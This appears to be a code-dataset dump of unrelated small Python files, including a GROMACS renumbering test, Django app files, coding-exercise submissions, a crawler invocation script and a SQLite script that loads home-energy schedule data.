    (atoms_per_residue, number_of_residues) pairs.  For instance 8
    residues of 10 atoms followed by 5 residues of 3 atoms is
    ((10, 8), (3, 5)).  Numbering starts at *start_res* and wraps back
    to 1 past 99999, the widest resid a gro file can hold.
    """
    current = start_res - 1
    for atoms_per_res, n_residues in topology:
        for _ in range(n_residues):
            current += 1
            if current > 99999:
                current = 1
            for _ in range(atoms_per_res):
                yield current
def _create_runumbered(atoms, removed_res):
    """
    Remove residues from a structure and renumber the atoms and residues.

    :Parameters:
        - atoms: the list of dictionnary for atoms
        - remove_res: a list of resid to remove from the structure

    :Returns:
        - the new list renumbered
    """
    # Remove some residues
    keep = [atom for atom in atoms if not atom['resid'] in removed_res]
    # Renumber residues and atoms
    # (groio.renumber rewrites both 'resid' and 'atomid' consecutively)
    renumbered = groio.renumber(keep)
    return renumbered
def _test_renumber(atoms, topology):
    """
    Test atom renumbering.

    :Parameters:
        - atoms: the list of dictionnary for atoms
        - topology: the residue succession, see :func:`residue_numbers`
    """
    # Walk the expected residue numbering in lockstep with the renumbered
    # atoms; atom IDs must simply be consecutive 1-based positions.
    # (The "+ 3" in the messages maps list index to gro file line number.)
    for line_number, (ref_resid, atom) \
            in enumerate(zip(residue_numbers(topology),
                             atoms)):
        resid = atom["resid"]
        atomid = atom["atomid"]
        ref_atomid = line_number + 1
        # Check the residue
        assert resid == ref_resid, \
            ("Residue ID is wrong after renumbering: "
             "{0} instead of {1} at line {2}").format(
                 resid, ref_resid, line_number + 3)
        # Check the atom
        assert atomid == ref_atomid, \
            ("Atom ID is wrong after renumbering: "
             "{0} instead of {1} at line {2}").format(
                 atomid, ref_atomid, line_number + 3)
if __name__ == "__main__":
    # Allow running this test module directly, outside a test runner.
    unittest.main()
| [
"hubert.santuz@gmail.com"
] | hubert.santuz@gmail.com |
b8664ce8a44166d29e61a75e3ca17132ba423261 | 76eb17916555462a9219cb7cfea741b2281ace7b | /testbot/urls.py | 8b8843e97dfa5a7526faad8d82ac7c207b0cbefc | [
"MIT"
] | permissive | luungoc2005/chatbot_test | 6ecabbe507d01418282a883d6ab70eb10130c991 | f8c901c9c14a50727a7b514dda1e569c8180b458 | refs/heads/master | 2021-08-30T13:07:20.132250 | 2017-11-15T03:35:47 | 2017-11-15T03:35:47 | 105,901,223 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 229 | py | from django.urls import path
from . import views
# URL routes for the testbot app: index page, example list, and test view.
urlpatterns = [
    # ex: /testbot/
    path('', views.index, name='index'),
    # ex: /testbot/examples/
    path('examples/', views.examples, name='examples'),
    # ex: /testbot/test/
    path('test/', views.test, name='test'),
]
"luungoc2005@gmail.com"
] | luungoc2005@gmail.com |
5cac8cdc56b579d7b87c1b9d6a558ed496f54f49 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /7QPHWACcDihT3AM6b_6.py | 42998e86441fe6f7df22cf74314d844cef6aab32 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 871 | py | """
You are given an input array of bigrams, and an array of words.
Write a function that returns `True` if **every single bigram** from this
array can be found at least **once** in an array of words.
### Examples
can_find(["at", "be", "th", "au"], ["beautiful", "the", "hat"]) ➞ True
can_find(["ay", "be", "ta", "cu"], ["maybe", "beta", "abet", "course"]) ➞ False
# "cu" does not exist in any of the words.
can_find(["th", "fo", "ma", "or"], ["the", "many", "for", "forest"]) ➞ True
can_find(["oo", "mi", "ki", "la"], ["milk", "chocolate", "cooks"]) ➞ False
### Notes
* A **bigram** is string of two consecutive characters in the same word.
* If the list of words is empty, return `False`.
"""
def can_find(bigrams, words):
for bi in bigrams:
if bi not in ''.join(words):
return False
return True
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
cd9d8b0b39e0e09d7940516635e9a94f971f38fc | 7f4886802e83352f37d35509b7775c93c2756105 | /accounts/forms.py | db5c1f9a162a945c87a84c42d50cf009988f7614 | [] | no_license | JihyeKim0923/lion10 | c23a019c3725de2d9f70556993db1ed3e8d6ae2e | 2b76dc9290bec6f4d827a625b2f0b1e92c85ed53 | refs/heads/master | 2020-06-19T02:56:24.746341 | 2019-07-11T15:40:17 | 2019-07-11T15:40:17 | 196,539,639 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 616 | py | from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from django import forms
class CreateUserForm(UserCreationForm):
email=forms.EmailField(required=True)
nickname=forms.CharField(required=True)
class Meta:
model=User
fields=("username","email","nickname","password1","password2")
def save(self, commit=True):
user=super(CreateUserForm,self).save(commit=False)
user.nickname=self.cleaned_data["nickname"]
user.email=self.cleaned_data["email"]
if commit:
user.save()
return user | [
"sos13313@naver.com"
] | sos13313@naver.com |
f0b3710c6bf6eebf47cd69db345fc58831d7d39c | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/308/usersdata/295/73012/submittedfiles/ex1.py | d7faface2964c55c9b074fbe6eed286761f20fc3 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 302 | py | # -*- coding: utf-8 -*-
from __future__ import division
a = input('Digite a: ')
b = input('Digite b: ')
c = input('Digite c: ')
#COMECE A PARTIR DAQUI!
a = input('Digite a: ')
b = input('Digite b: ')
c = input('Digite c: ')
f = a*(x**2) + b*x + c
if DH>0
print("X1 e X2")
else:
print("SRR")
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
8c24505675dcd7f8269bbafc518d90b57b7317eb | 71fb2f3ab9c0111cb491a50ed59988dd5fdc5235 | /login/mixins.py | 03bb7f0ecfe1bef50dd2f3cbf13ab7fed6bd25f6 | [
"BSD-3-Clause"
] | permissive | manezinho/EMSTrack-Django | f69d200a35bb95d0ace8bca34b12a841ca7fca24 | 91723944abcaf3b258ff52c1b8bad1ed532d8f0a | refs/heads/master | 2022-11-15T08:46:07.891927 | 2020-06-03T04:54:19 | 2020-06-03T04:54:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 437 | py | from mqtt.cache_clear import mqtt_cache_clear
class ClearPermissionCacheMixin:
def save(self, *args, **kwargs):
# save to UserProfile
super().save(*args, **kwargs)
# invalidate permissions cache
mqtt_cache_clear()
def delete(self, *args, **kwargs):
# delete from UserProfile
super().delete(*args, **kwargs)
# invalidate permissions cache
mqtt_cache_clear()
| [
"mcdeoliveira@earthlink.net"
] | mcdeoliveira@earthlink.net |
f7132cf3933990eadc7239ea00b892c2ab3f8b43 | d5e974c65ed58c5e62e09eb49de0754230b9f68a | /crawler/crawler_test.py | 1543a4c26b9d656acedd6cae00c413f9b28394f4 | [] | no_license | kjyggg-sketch/wordcloud | 224d28922768403f378c9ef220db5cf00bcc16ab | 86137dab4bb9683dc9495d6ad5b76fb4e7bdd836 | refs/heads/master | 2022-12-28T16:15:34.680973 | 2020-10-12T03:57:47 | 2020-10-12T03:57:47 | 276,003,998 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 975 | py | from crawler import navershopping
from crawler import naverblog
from crawler import bigkinds
#
# bigkinds.crawl(keyword='4차산업',
# startDate='2017-01-01',endDate='2020-04-01', nCrawl=100)
naverblog.crawl(keyword='데이터바우처',
startDate='2020-06-01',
endDate='2020-06-09',
nCrawl = 500)
# naverblog.crawl(keyword='바나나',
# startDate='2020-01-01',
# endDate='2020-05-31',
# nCrawl = 5000)
# navershopping.crawl("전자담배",
# 'https://smartstore.naver.com/ibholdings/products/4050389904?NaPm=ct%3Dkapcytsw%7Cci%3Ded4ec39f12b11008b2b8b38d4aa9754a14ad5590%7Ctr%3Dslsl%7Csn%3D791544%7Cic%3D%7Chk%3D11dd8f4f22874fda5fb99f3758fdc13f60935474',
# '궐련형 전자담배 죠즈20up jouz 아이코스3 듀오 릴플러스 차이코스 s 호환 20연타',
# comment="navershopping_test")
| [
"jykim@almaden.co.kr"
] | jykim@almaden.co.kr |
b68b80f86534d69c452cc1ff2a9135f02797455f | b10302009a97c00650a99a474bd266145b35c088 | /sqlite_database.py | 64ca554eb2e778d9e14343266271bab6955aa934 | [] | no_license | robynkwamo/RUBi | 2dce8c17d71cf90c0254ec69b8811da17101897d | 2dce8be4795b8be0e45d9e1e209335a4311f24be | refs/heads/master | 2020-07-01T13:48:48.309527 | 2019-08-08T06:29:49 | 2019-08-08T06:29:49 | 201,187,713 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 41,762 | py | import sqlite3
from data import *
#### open (or create) the on-disk working database ####
conn = sqlite3.connect('dataHub.db')
####**** for testing, an in-memory database can be used instead ****####
# conn = sqlite3.connect(':memory:')
#### single shared cursor used by every statement in this module ####
c = conn.cursor()

#### start from a clean slate: drop every table this module rebuilds below ####
# (note: creditGeneratedWeek is deliberately absent from this list further down)
for _stale_table in (
        'totalSolar1',
        'powerCostWeek1',
        'powerCostWeekend1',
        'isHomeWeek1',
        'isHomeWeekend1',
        'isSleepingWeek1',
        'isSleepingWeekend1',
        'isLightWeek1',
        'isLightWeekend1',
        'waterheaterPowerWeek1',
        'LightPowerWeek1',
        'LightPowerWeekend1',
        'totalStaticPowerUsedWeek1',
        'totalStaticPowerUsedWeekend1',
        'tempPrefSimple0',
        'tempPrefWeek1',
        'tempPrefWeekend1',
        'freeVariable',
        'acPowerWeek',
        'acPowerWeekend',
        'carChargerPowerWeek',
        'carChargerPowerWeekend'):
    c.execute('DROP TABLE IF EXISTS ' + _stale_table)
#??????????????????????????????????????????????? TO DO LIST ???????????????????????????????????????????????????????????#
# Change some functions name to make them shorter                                                                      #
#                                                                                                                      #
#??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????#
##########################******************** Unique variable import ******************################################
# NOTE(review): the assignments below are no-op self-rebindings of names that must
# already exist via `from data import *` at the top of this module.  They appear to
# serve only as documentation of which data.py scalars this module depends on.
# TODO confirm every one of these names is defined in data.py -- otherwise importing
# this module raises NameError at the first missing name.
panelPower = panelPower
numPanels = numPanels
numLights = numLights
oneLightPower = oneLightPower
outsideTemp = outsideTemp
indoorTemp = indoorTemp
sleepingTemp = sleepingTemp
##########################******************** totalSolar1: hourly solar generation ******************##################
c.execute(""" CREATE TABLE IF NOT EXISTS totalSolar1 (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                powerAvailable INTEGER )""")

def insert_hourly_power():
    """Copy every hourly solar-generation sample into totalSolar1, keyed by hour index."""
    with conn:
        for hour, sample in enumerate(totalSolarAvailable):
            c.execute("INSERT INTO totalSolar1 VALUES (?, ?)", (hour, sample))

insert_hourly_power()  # populate the table once, at import time

def get_hourly_power_by_daytime_from_db(dayTime):
    """Return the single-column row (powerAvailable,) for hour *dayTime*, or None if absent."""
    c.execute("SELECT powerAvailable FROM totalSolar1 WHERE dayTime=?", (dayTime,))
    return c.fetchone()

def convert_to_integer_get_hourly_power_by_daytime_from_db(dayTime):
    """Unwrap the fetched row and return the bare power value for hour *dayTime*."""
    return get_hourly_power_by_daytime_from_db(dayTime)[0]
#############################****************** powerCostWeek1 / powerCostWeekend1 tables *******************###########
# Hourly grid power price, one table for weekdays and one for weekend days.
c.execute(""" CREATE TABLE IF NOT EXISTS powerCostWeek1 (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                powerCost INTEGER )""")

def insert_power_cost_week():
    """Store each weekday hourly power cost from data.py into powerCostWeek1."""
    with conn:
        for hour, cost in enumerate(powerCostWeek):
            c.execute("INSERT INTO powerCostWeek1 VALUES (?, ?)", (hour, cost))

insert_power_cost_week()

def get_hourly_power_cost_by_daytime_week_from_db(dayTime):
    """Return the (powerCost,) row for weekday hour *dayTime*, or None."""
    c.execute("SELECT powerCost FROM powerCostWeek1 WHERE dayTime=?", (dayTime,))
    return c.fetchone()

def convert_to_integer_get_hourly_power_cost_by_daytime_week_from_db(dayTime):
    """Bare weekday power-cost value for hour *dayTime*."""
    return get_hourly_power_cost_by_daytime_week_from_db(dayTime)[0]

c.execute(""" CREATE TABLE IF NOT EXISTS powerCostWeekend1 (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                powerCost INTEGER )""")

def insert_power_cost_weekend():
    """Store each weekend hourly power cost from data.py into powerCostWeekend1."""
    with conn:
        for hour, cost in enumerate(powerCostWeekend):
            c.execute("INSERT INTO powerCostWeekend1 VALUES (?, ?)", (hour, cost))

insert_power_cost_weekend()

def get_hourly_power_cost_by_daytime_weekend_from_db(dayTime):
    """Return the (powerCost,) row for weekend hour *dayTime*, or None."""
    c.execute("SELECT powerCost FROM powerCostWeekend1 WHERE dayTime=?", (dayTime,))
    return c.fetchone()

def convert_to_integer_get_hourly_power_cost_by_daytime_weekend_from_db(dayTime):
    """Bare weekend power-cost value for hour *dayTime*."""
    return get_hourly_power_cost_by_daytime_weekend_from_db(dayTime)[0]
#############################****************** occupancy / sleep tables *******************############################
# isHomeWeek1, isSleepingWeek1, isHomeWeekend1 hold hourly 0/1 flags from data.py,
# keyed by hour index.
c.execute(""" CREATE TABLE IF NOT EXISTS isHomeWeek1 (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                isHome INTEGER )""")

def insert_isHomeWeek1():
    """Store the weekday at-home flags (0 = away, 1 = home) keyed by hour."""
    with conn:
        for hour, flag in enumerate(isHomeWeek):
            c.execute("INSERT INTO isHomeWeek1 VALUES (?, ?)", (hour, flag))

insert_isHomeWeek1()

def get_hourly_isHomeweek_from_db(dayTime):
    """Return the (isHome,) row for weekday hour *dayTime*, or None."""
    c.execute("SELECT isHome FROM isHomeWeek1 WHERE dayTime=?", (dayTime,))
    return c.fetchone()

def convert_to_int_get_hourly_isHomeweek_from_db(dayTime):
    """Bare weekday at-home flag for hour *dayTime*."""
    return get_hourly_isHomeweek_from_db(dayTime)[0]

c.execute(""" CREATE TABLE IF NOT EXISTS isSleepingWeek1 (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                isSleeping INTEGER )""")

def insert_isSleepingWeek1():
    """Store the weekday sleep flags (0 = awake, 1 = sleeping) keyed by hour."""
    with conn:
        for hour, flag in enumerate(isSleepingWeek):
            c.execute("INSERT INTO isSleepingWeek1 VALUES (?, ?)", (hour, flag))

insert_isSleepingWeek1()

def get_hourly_isSleepingWeek_from_db(dayTime):
    """Return the (isSleeping,) row for weekday hour *dayTime*, or None."""
    c.execute("SELECT isSleeping FROM isSleepingWeek1 WHERE dayTime=?", (dayTime,))
    return c.fetchone()

def convert_to_int_get_hourly_isSleepingWeek_from_db(dayTime):
    """Bare weekday sleep flag for hour *dayTime*."""
    return get_hourly_isSleepingWeek_from_db(dayTime)[0]

c.execute(""" CREATE TABLE IF NOT EXISTS isHomeWeekend1 (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                isHome INTEGER )""")

def insert_isHomeWeekend1():
    """Store the weekend at-home flags (0 = away, 1 = home) keyed by hour."""
    with conn:
        for hour, flag in enumerate(isHomeWeekend):
            c.execute("INSERT INTO isHomeWeekend1 VALUES (?, ?)", (hour, flag))

insert_isHomeWeekend1()

def get_hourly_isHomeweekend_from_db(dayTime):
    """Return the (isHome,) row for weekend hour *dayTime*, or None."""
    c.execute("SELECT isHome FROM isHomeWeekend1 WHERE dayTime=?", (dayTime,))
    return c.fetchone()

def convert_to_int_get_hourly_isHomeweekend_from_db(dayTime):
    """Bare weekend at-home flag for hour *dayTime*."""
    return get_hourly_isHomeweekend_from_db(dayTime)[0]
#############################****************** isSleepingWeekend1 table *******************############################
c.execute(""" CREATE TABLE IF NOT EXISTS isSleepingWeekend1 (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                isSleeping INTEGER )""")
#### Insertion Methods in the database for isSleepingWeekend1 table ####
def insert_isSleepingWeekend1():
    """Store the hourly weekend sleep flags (isSleepingWeekend from data.py,
    0 = awake, 1 = sleeping) into isSleepingWeekend1, keyed by hour index."""
    with conn:
        i = 0
        for item in isSleepingWeekend:
            c.execute("INSERT INTO isSleepingWeekend1 VALUES (?, ?)", (i, item))
            i = i + 1
#### Insert when customer is sleeping (weekend) in database ####
insert_isSleepingWeekend1()

def get_hourly_isSleepingWeekend_from_db(dayTime):
    """Return the (isSleeping,) row for weekend hour *dayTime*, or None.

    BUG FIX: this previously queried the weekday table isSleepingWeek1,
    silently returning weekday data; it now reads isSleepingWeekend1.
    """
    c.execute("SELECT isSleeping FROM isSleepingWeekend1 WHERE dayTime=?", (dayTime,))
    return c.fetchone()

#### convert the fetched row to the bare flag value ####
def convert_to_int_get_hourly_isSleepingWeekend_from_db(dayTime):
    """Unwrap the row returned above; raises TypeError if the hour is absent."""
    y = get_hourly_isSleepingWeekend_from_db(dayTime)
    z = y[0]
    return z
#############################****************** isLightWeek1 / isLightWeekend1 tables *******************###############
# Hourly 0/1 light-on flags, one table for weekdays and one for weekend days.
c.execute(""" CREATE TABLE IF NOT EXISTS isLightWeek1 (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                isLight INTEGER )""")

def insert_isLightWeek1():
    """Store the weekday light flags (0 = off, 1 = on) keyed by hour."""
    with conn:
        for hour, flag in enumerate(isLightWeek):
            c.execute("INSERT INTO isLightWeek1 VALUES (?, ?)", (hour, flag))

insert_isLightWeek1()

def get_hourly_isLightWeek_from_db(dayTime):
    """Return the (isLight,) row for weekday hour *dayTime*, or None."""
    c.execute("SELECT isLight FROM isLightWeek1 WHERE dayTime=?", (dayTime,))
    return c.fetchone()

def convert_to_int_get_hourly_isLightWeek_from_db(dayTime):
    """Bare weekday light flag for hour *dayTime*."""
    return get_hourly_isLightWeek_from_db(dayTime)[0]

c.execute(""" CREATE TABLE IF NOT EXISTS isLightWeekend1 (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                isLight INTEGER )""")

def insert_isLightWeekend1():
    """Store the weekend light flags (0 = off, 1 = on) keyed by hour."""
    with conn:
        for hour, flag in enumerate(isLightWeekend):
            c.execute("INSERT INTO isLightWeekend1 VALUES (?, ?)", (hour, flag))

insert_isLightWeekend1()

def get_hourly_isLightWeekend_from_db(dayTime):
    """Return the (isLight,) row for weekend hour *dayTime*, or None."""
    c.execute("SELECT isLight FROM isLightWeekend1 WHERE dayTime=?", (dayTime,))
    return c.fetchone()

def convert_to_int_get_hourly_isLightWeekend_from_db(dayTime):
    """Bare weekend light flag for hour *dayTime*."""
    return get_hourly_isLightWeekend_from_db(dayTime)[0]
#############################****************** waterheaterPowerWeek1 table *******************#########################
c.execute(""" CREATE TABLE IF NOT EXISTS waterheaterPowerWeek1 (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                isOn INTEGER )""")
#### Insertion Methods in the database for waterheaterPowerWeek1 table ####
def insert_waterheaterPowerWeek1():
    """Store the weekday water-heater schedule (WaterheaterPowerWeek from data.py)
    into waterheaterPowerWeek1, keyed by hour index.

    SQLite table names are case-insensitive, so the mixed-case INSERT target
    below resolves to the waterheaterPowerWeek1 table created above.
    """
    with conn:
        i = 0
        for item in WaterheaterPowerWeek:
            c.execute("INSERT INTO WaterheaterPowerWeek1 VALUES (?, ?)", (i, item))
            i = i + 1
#### Insert the water-heater schedule in database ####
insert_waterheaterPowerWeek1()

def get_hourly_waterheaterPowerWeek_from_db(dayTime):
    """Return the (isOn,) row for weekday hour *dayTime*, or None.

    BUG FIX: this previously selected FROM WaterheaterPowerWeek (no trailing
    '1'), a table that is never created, so every call raised
    sqlite3.OperationalError ("no such table").
    """
    c.execute("SELECT isOn FROM waterheaterPowerWeek1 WHERE dayTime=?", (dayTime,))
    return c.fetchone()

#### convert the fetched row to the bare on/off value ####
def convert_to_int_get_hourly_waterheaterPowerWeek_from_db(dayTime):
    """Unwrap the row returned above; raises TypeError if the hour is absent."""
    y = get_hourly_waterheaterPowerWeek_from_db(dayTime)
    z = y[0]
    return z
#############################****************** LightPowerWeek1 / LightPowerWeekend1 tables *******************#########
# Hourly lighting power consumption, one table for weekdays and one for weekends.
c.execute(""" CREATE TABLE IF NOT EXISTS LightPowerWeek1 (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                lightCost INTEGER )""")

def insert_LightPowerWeek1():
    """Store the weekday lighting consumption series keyed by hour."""
    with conn:
        for hour, cost in enumerate(LightPowerWeek):
            c.execute("INSERT INTO LightPowerWeek1 VALUES (?, ?)", (hour, cost))

insert_LightPowerWeek1()

def get_hourly_LightPowerWeek_from_db(dayTime):
    """Return the (lightCost,) row for weekday hour *dayTime*, or None."""
    c.execute("SELECT lightCost FROM LightPowerWeek1 WHERE dayTime=?", (dayTime,))
    return c.fetchone()

def convert_to_int_get_hourly_LightPowerWeek_from_db(dayTime):
    """Bare weekday lighting power value for hour *dayTime*."""
    return get_hourly_LightPowerWeek_from_db(dayTime)[0]

c.execute(""" CREATE TABLE IF NOT EXISTS LightPowerWeekend1 (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                lightCost INTEGER )""")

def insert_LightPowerWeekend1():
    """Store the weekend lighting consumption series keyed by hour."""
    with conn:
        for hour, cost in enumerate(LightPowerWeekend):
            c.execute("INSERT INTO LightPowerWeekend1 VALUES (?, ?)", (hour, cost))

insert_LightPowerWeekend1()

def get_hourly_LightPowerWeekend_from_db(dayTime):
    """Return the (lightCost,) row for weekend hour *dayTime*, or None."""
    c.execute("SELECT lightCost FROM LightPowerWeekend1 WHERE dayTime=?", (dayTime,))
    return c.fetchone()

def convert_to_int_get_hourly_LightPowerWeekend_from_db(dayTime):
    """Bare weekend lighting power value for hour *dayTime*."""
    return get_hourly_LightPowerWeekend_from_db(dayTime)[0]
#############################****************** totalStaticPowerUsed tables *******************#########################
# Hourly combined "static" appliance consumption (per the original comments:
# water heater + fridge + lights), weekday and weekend variants.
c.execute(""" CREATE TABLE IF NOT EXISTS totalStaticPowerUsedWeek1 (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                staticPowerUsed INTEGER )""")

def insert_totalStaticPowerUsedWeek1():
    """Store the weekday static-consumption series keyed by hour."""
    with conn:
        for hour, used in enumerate(totalStaticPowerUsedWeek):
            c.execute("INSERT INTO totalStaticPowerUsedWeek1 VALUES (?, ?)", (hour, used))

insert_totalStaticPowerUsedWeek1()

def get_hourly_totalStaticPowerUsedWeek_from_db(dayTime):
    """Return the (staticPowerUsed,) row for weekday hour *dayTime*, or None."""
    c.execute("SELECT staticPowerUsed FROM totalStaticPowerUsedWeek1 WHERE dayTime=?", (dayTime,))
    return c.fetchone()

def convert_to_int_get_hourly_totalStaticPowerUsedWeek_from_db(dayTime):
    """Bare weekday static-consumption value for hour *dayTime*."""
    return get_hourly_totalStaticPowerUsedWeek_from_db(dayTime)[0]

c.execute(""" CREATE TABLE IF NOT EXISTS totalStaticPowerUsedWeekend1 (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                staticPowerUsed INTEGER )""")

def insert_totalStaticPowerUsedWeekend1():
    """Store the weekend static-consumption series keyed by hour."""
    with conn:
        for hour, used in enumerate(totalStaticPowerUsedWeekend):
            c.execute("INSERT INTO totalStaticPowerUsedWeekend1 VALUES (?, ?)", (hour, used))

insert_totalStaticPowerUsedWeekend1()

def get_hourly_totalStaticPowerUsedWeekend_from_db(dayTime):
    """Return the (staticPowerUsed,) row for weekend hour *dayTime*, or None."""
    c.execute("SELECT staticPowerUsed FROM totalStaticPowerUsedWeekend1 WHERE dayTime=?", (dayTime,))
    return c.fetchone()

def convert_to_int_get_hourly_totalStaticPowerUsedWeekend_from_db(dayTime):
    """Bare weekend static-consumption value for hour *dayTime*."""
    return get_hourly_totalStaticPowerUsedWeekend_from_db(dayTime)[0]
#############################****************** tempPrefSimple0 table *******************###############################
c.execute(""" CREATE TABLE IF NOT EXISTS tempPrefSimple0 (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                prefTemp INTEGER )""")

def insert_tempPrefSimple():
    """Store the simple preferred-temperature series (tempPrefSimple0 from data.py),
    keyed by hour index."""
    with conn:
        for hour, temp in enumerate(tempPrefSimple0):
            c.execute("INSERT INTO tempPrefSimple0 VALUES (?, ?)", (hour, temp))

insert_tempPrefSimple()

def get_hourly_tempPrefSimple0_from_db(dayTime):
    """Return the (prefTemp,) row for hour *dayTime*, or None."""
    c.execute("SELECT prefTemp FROM tempPrefSimple0 WHERE dayTime=?", (dayTime,))
    return c.fetchone()

def convert_to_int_get_hourly_tempPrefSimple_from_db(dayTime):
    """Bare preferred-temperature value for hour *dayTime*."""
    return get_hourly_tempPrefSimple0_from_db(dayTime)[0]
#############################****************** tempPrefWeek1 table *******************#################################
c.execute(""" CREATE TABLE IF NOT EXISTS tempPrefWeek1 (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                prefTemp INTEGER )""")

def insert_tempPrefWeek1():
    """Store the weekday preferred-temperature series into tempPrefWeek1, keyed by hour.

    NOTE(review): iterates a module-level name ``tempPrefWeek1`` that must come
    from ``from data import *`` -- confirm data.py actually defines it, otherwise
    this raises NameError when called at import time.
    """
    with conn:
        for hour, temp in enumerate(tempPrefWeek1):
            c.execute("INSERT INTO tempPrefWeek1 VALUES (?, ?)", (hour, temp))

insert_tempPrefWeek1()

def get_hourly_tempPrefWeek1_from_db(dayTime):
    """Return the (prefTemp,) row for weekday hour *dayTime*, or None."""
    c.execute("SELECT prefTemp FROM tempPrefWeek1 WHERE dayTime=?", (dayTime,))
    return c.fetchone()

def convert_to_int_get_hourly_tempPrefWeek1_from_db(dayTime):
    """Bare preferred weekday temperature for hour *dayTime*."""
    return get_hourly_tempPrefWeek1_from_db(dayTime)[0]
#############################****************** tempPrefWeekend1 table *******************##############################
c.execute(""" CREATE TABLE IF NOT EXISTS tempPrefWeekend1 (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                prefTemp INTEGER )""")

def insert_tempPrefWeekend1():
    """Store the weekend preferred-temperature series into tempPrefWeekend1, keyed by hour.

    NOTE(review): iterates a module-level name ``tempPrefWeekend1`` that must
    come from ``from data import *`` -- confirm data.py actually defines it.
    """
    with conn:
        for hour, temp in enumerate(tempPrefWeekend1):
            c.execute("INSERT INTO tempPrefWeekend1 VALUES (?, ?)", (hour, temp))

insert_tempPrefWeekend1()

def get_hourly_tempPrefWeekend1_from_db(dayTime):
    """Return the (prefTemp,) row for weekend hour *dayTime*, or None."""
    c.execute("SELECT prefTemp FROM tempPrefWeekend1 WHERE dayTime=?", (dayTime,))
    return c.fetchone()

def convert_to_int_get_hourly_tempPrefWeekend1_from_db(dayTime):
    """Bare preferred weekend temperature for hour *dayTime*."""
    return get_hourly_tempPrefWeekend1_from_db(dayTime)[0]
#############################****************** create a tempPrefWeekend0 table *******************#####################
# NOTE(review): this entire section is a copy-paste duplicate of the
# tempPrefWeekend1 section directly above.  Running it redefines the same three
# functions and re-runs the insert; because this copy uses INSERT OR IGNORE and
# the rows already exist with the same primary keys, the duplicate inserts are
# silently skipped, so behaviour is unchanged -- but this block should probably
# be deleted.
c.execute(""" CREATE TABLE IF NOT EXISTS tempPrefWeekend1 (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                prefTemp INTEGER )""")
#### Insertion Methods in the database for tempPrefWeekend1 table ####
def insert_tempPrefWeekend1(): # insert what is the preferred temperature during weekend days
    # assumes data.py defines a list named tempPrefWeekend1 -- TODO confirm
    with conn:
        i = 0
        for item in tempPrefWeekend1:
            c.execute("INSERT OR IGNORE INTO tempPrefWeekend1 VALUES (?, ?)", (i, item))
            i = i + 1
#### Insert preferred temperature during the weekend in database ####
insert_tempPrefWeekend1()
def get_hourly_tempPrefWeekend1_from_db(dayTime): # get hourly preferred temperature during weekend days by id / dayTime
    c.execute("SELECT prefTemp FROM tempPrefWeekend1 WHERE dayTime=?", (dayTime,))
    #c.execute("SELECT * FROM tempPrefWeekend1") ### For debug only ####
    return c.fetchone()
#### convert the value of the tempPrefWeekend1 temperature at x hour of the day to int ####
def convert_to_int_get_hourly_tempPrefWeekend1_from_db(dayTime):
    y = get_hourly_tempPrefWeekend1_from_db(dayTime)
    z = y[0]
    return z
#print (get_hourly_tempPrefWeekend1_from_db())
#############################****************** acPowerWeek / acPowerWeekend tables *******************#################
# Hourly A/C power draw, one table for weekdays and one for weekend days.
c.execute(""" CREATE TABLE IF NOT EXISTS acPowerWeek (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                powerUsed INTEGER )""")

def insert_acPowerWeek():
    """Load the weekday A/C consumption series into acPowerWeek, keyed by hour.
    Uses INSERT OR IGNORE, so existing rows with the same hour key are kept."""
    with conn:
        for hour, used in enumerate(acPowerWeek):
            c.execute("INSERT OR IGNORE INTO acPowerWeek VALUES (?, ?)", (hour, used))

insert_acPowerWeek()

def get_hourly_acPowerWeek_from_db(dayTime):
    """Return the (powerUsed,) row for weekday hour *dayTime*, or None."""
    c.execute("SELECT powerUsed FROM acPowerWeek WHERE dayTime=?", (dayTime,))
    return c.fetchone()

def convert_to_int_get_hourly_acPowerWeek_from_db(dayTime):
    """Bare weekday A/C power value for hour *dayTime*."""
    return get_hourly_acPowerWeek_from_db(dayTime)[0]

c.execute(""" CREATE TABLE IF NOT EXISTS acPowerWeekend (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                powerUsed INTEGER )""")

def insert_acPowerWeekend():
